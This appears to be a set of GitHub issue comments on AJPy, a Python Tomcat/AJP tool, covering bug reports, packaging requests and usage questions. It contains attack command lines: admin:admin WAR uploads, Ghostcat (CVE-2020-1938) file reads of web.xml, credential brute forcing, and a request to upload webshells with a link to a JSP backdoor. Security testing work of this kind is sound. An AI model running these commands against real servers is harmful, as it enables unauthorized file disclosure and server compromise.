this is the command i run in the powershell:
python tomcat.py upload -u admin -p admin Linuxx.war 192.168.0.103

Traceback (most recent call last):
File "tomcat.py", line 366, in
bf.upload(args.filename, args.user, args.password, args.old_version, args.headers)
File "tomcat.py", line 177, in upload
deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers)
TypeError: 'NoneType' object is not iterable

Hi Julien

Thanks for the scripts. I am having a few issues while trying to use them, not sure if I am following the right steps.

Did not work code:
mymac:AJPy cd$ python tomcat.py version 10.2.2.11 --port 20022 usage: tomcat.py [-h] [--port PORT] [-v] {bf,upload,undeploy,version,list,read_file} ... target tomcat.py: error: unrecognized arguments: 10.2.2.11 --port

mymac:AJPy cd$ python tomcat.py list 10.2.2.11 Traceback (most recent call last): File "tomcat.py", line 355, in <module> bf = Tomcat(args.target, args.port) File "tomcat.py", line 78, in __init__ self.socket.connect((target_host, target_port)) ConnectionRefusedError: [Errno 61] Connection refused

This server was vulnerable but the script came back with no.

mymac:AJPy chandan$ python tomcat.py version 10.2.2.12 None

Hi Julien,

I am about to package AJPy for Debian, but found out that the license of AJPy isn't well defined. The header in ajp.py looks like a BSD license, but since you didn't include it completely, I can't know if it's a BSD-2, 3 or 4 clause. Can you clarify this point?

Thanks for your work !

Hey,

First of, great job.

Could you consider create a pip package (and publish it to Pypi) for your library so it can be reused in other tool ? I'm mostly thinking of patator, for which it would not take a lot of effort to integrate and add AJP support.

Cheers

Oy!

The credentials bruteforce feature silently fails due to multiple operations in test_password expecting bytes instead of str.

For example:

def test_password(self, user, password):
		res = False
		stop = False
		self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + b64encode("%s:%s" % (user, password)).replace('\n', '')

b64encode is expecting bytes.

I use is only one time, the target host is down and can't do anything
socket.error: [Errno 10054]
the host rerjects my connection?
what code triggers it

A script should be able to handle the following application servers:

• Apache Tomcat
• Apache Geronimo
• JBoss
• Jetty
• Oracle Glassfish
• Oracle Application Server
• Oracle WebLogic Server
• Resin web server
• IBM WebSphere
• Adobe ColdFusion
• WebObjects
• SAP NetWeaver Application Server
• Payara Server

Maybe create a ajpwn.py with modules.

Looking in the method send_and_receive() in AjpForwardRequest there are the lines:

		res = []
		i = socket.sendall(self.serialize())
		if self.method == AjpForwardRequest.POST:
			return res

Is there no way to read the payload response when performing a POST?

Hello, I have some questions for you.

first:

if I want to read file in ROOT, what should I do?

for example:

a file is D:\ALL\javaidea\apache-tomcat-8.5.50-src\source\webapps\test.txt

Can I read this? I tried a lot, but I couldn't solve it.:(

second: Can I read it in springboot?

also, I tried a lot, but I couldn't solve it.:(

Please could you add a requirements.txt.

Hey there!

I ran across this lib while looking for ways to check for the recent "Ghostcat" CVE. When trying to use the code (both as a lib and using the standalone tomcat.py script) to check for the vuln on a testing host, I encounter timeouts when waiting on a socket. Here's the stacktrace I get when running tomcat.py.

sh-3.2# python tomcat.py version <VULNERABLE HOSTNAME>
Apache Tomcat/8.5.32
sh-3.2# python tomcat.py read_file --webapp=manager /WEB-INF/web.xml <VULNERABLE HOSTNAME>
Traceback (most recent call last):
  File "tomcat.py", line 377, in <module>
    hdrs, data = bf.perform_request("/" + args.webapp + "/xxxxx.jsp", attributes=attributes)
  File "tomcat.py", line 153, in perform_request
    responses = self.forward_request.send_and_receive(self.socket, self.stream)
  File "/.../AJPy/ajpy/ajp.py", line 274, in send_and_receive
    r = AjpResponse.receive(stream)
  File "/.../AJPy/ajpy/ajp.py", line 380, in receive
    r.parse(stream)
  File "/.../AJPy/ajpy/ajp.py", line 337, in parse
    self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")
  File "/.../AJPy/ajpy/ajp.py", line 44, in unpack
    buf = stream.read(size)
  File "/usr/local/Cellar/python/3.7.6_1/Frameworks/Python.framework/Versions/3.7/lib/python3.7/socket.py", line 589, in readinto
    return self._sock.recv_into(b)
TimeoutError: [Errno 60] Operation timed out

As you can see, I can get the server version correctly from the first call, so there's no issue with connectivity to the host. I'm on MacOS using Python version 3.7.6 (installed via homebrew). Any insight into what's up would be helpful.

Hello, author. I found that you have a problem when the matching version, in the regular match out, I do not know whether your space is intentional or unintentional, through my practice encountered the version does not match the problem, has now been removed fixed.

Getting this error anytime I try to run this tool.

/AJPy/ajpy/ajp.py

kali2020.4
python 2.7.18

def unpack(stream, fmt): print stream, fmt size = struct.calcsize(fmt) print size buf = stream.read(size) print buf if "" in buf: print "error" return struct.unpack(fmt, buf)

`<socket._fileobject object at 0x7f4b45690ad0> >HHb
5

error
Traceback (most recent call last):
File "tomcat.py", line 378, in
hdrs, data = bf.perform_request("/" + args.webapp + "/xxxxx.jsp", attributes=attributes)
File "tomcat.py", line 154, in perform_request
responses = self.forward_request.send_and_receive(self.socket, self.stream)
File "。。。。。。。。。。。/AJPy-master/ajpy/ajp.py", line 279, in send_and_receive
r = AjpResponse.receive(stream)
File "。。。。。。。。。。。/AJPy-master/ajpy/ajp.py", line 385, in receive
r.parse(stream)
File "。。。。。。。。。。。/AJPy-master/ajpy/ajp.py", line 342, in parse
self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")
File "。。。。。。。。。。。/AJPy-master/ajpy/ajp.py", line 50, in unpack
return struct.unpack(fmt, buf)
struct.error: unpack requires a string argument of length 5
`

Uploading large WAR files does not work.
Tomcat error:

sept. 22, 2017 4:43:23 PM org.apache.coyote.ajp.AjpMessage processHeader
GRAVE: Invalid message received with signature 17439
sept. 22, 2017 4:43:23 PM org.apache.coyote.ajp.AjpMessage processHeader
GRAVE: Invalid message received with signature 11565

Test file: https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/browser.jsp

Add the support for the POST method in order to upload webshell WAR through Tomcat manager.

Currently, the WAR upload fails with the following error:

FAIL - Invalid context path null was specified

Reading file using CVE-2020-1938

$ python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 172.17.0.2

--webapp=manager is not always the case, it might just be omitted.